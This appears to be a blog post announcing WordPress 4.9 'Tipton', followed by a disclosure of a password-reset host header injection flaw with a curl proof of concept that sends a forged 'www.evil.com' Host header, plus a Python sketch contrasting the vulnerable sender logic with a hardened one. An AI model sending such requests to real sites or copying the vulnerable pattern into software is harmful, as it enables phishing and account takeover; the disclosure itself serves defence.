Version 4.9 of WordPress, named “Tipton” in honor of jazz musician and band leader Billy Tipton, is available for download or update in your WordPress dashboard. New features in 4.9 will smooth your design workflow and keep you safe from coding errors.

Featuring design drafts, scheduling, and locking, along with preview links, the Customizer workflow improves collaboration for content creators. What’s more, code syntax highlighting and error checking will make for a clean and smooth site building experience. Finally, if all that wasn’t pretty great, we’ve got an awesome new Gallery widget and improvements to theme browsing and switching.

Security Fix

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

Description

An attacker may be able to set the 'From' email header in password reset emails.

Proof of Concept

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" "http://example.com/wp-login.php?action=lostpassword"


https://wpvulndb.com/vulnerabilities/8807
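The Host-to-From flow behind this issue, next to a hardened form, as an added example: a simplified Python model, not WordPress code and not taken from the advisory. It assumes the sender is built as "wordpress@" plus the request's host name with a leading "www." removed; ALLOWED_HOSTS, CANONICAL_HOST and the function names are hypothetical.

```python
from email.message import EmailMessage

# Assumption: hostnames this site is configured to serve (constructed values).
ALLOWED_HOSTS = {"example.com", "www.example.com"}
CANONICAL_HOST = "example.com"


def normalize_host(host_header: str) -> str:
    """Lower-case the Host header value and drop any port."""
    host = host_header.strip().lower()
    if host.startswith("["):  # bracketed IPv6 literal, e.g. [::1]:8080
        return host.split("]")[0] + "]"
    return host.split(":")[0]


def from_address_vulnerable(host_header: str) -> str:
    """Sender derived from the request: whatever host the client sent wins."""
    host = normalize_host(host_header)
    if host.startswith("www."):
        host = host[4:]
    return "wordpress@" + host


def from_address_hardened(host_header: str) -> str:
    """Sender comes from configuration; the Host header is only validated."""
    if normalize_host(host_header) not in ALLOWED_HOSTS:
        raise ValueError("unexpected Host header: %r" % host_header)
    return "wordpress@" + CANONICAL_HOST


def build_reset_mail(from_addr: str, to_addr: str) -> EmailMessage:
    """Assemble the password reset message with the chosen sender."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = "Password Reset"
    msg.set_content("Follow the link on the site to reset your password.")
    return msg
```

The same split applies at the web server: a default virtual host that rejects unknown Host values keeps such requests from reaching the application at all.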



Thursday, November 16, 2017






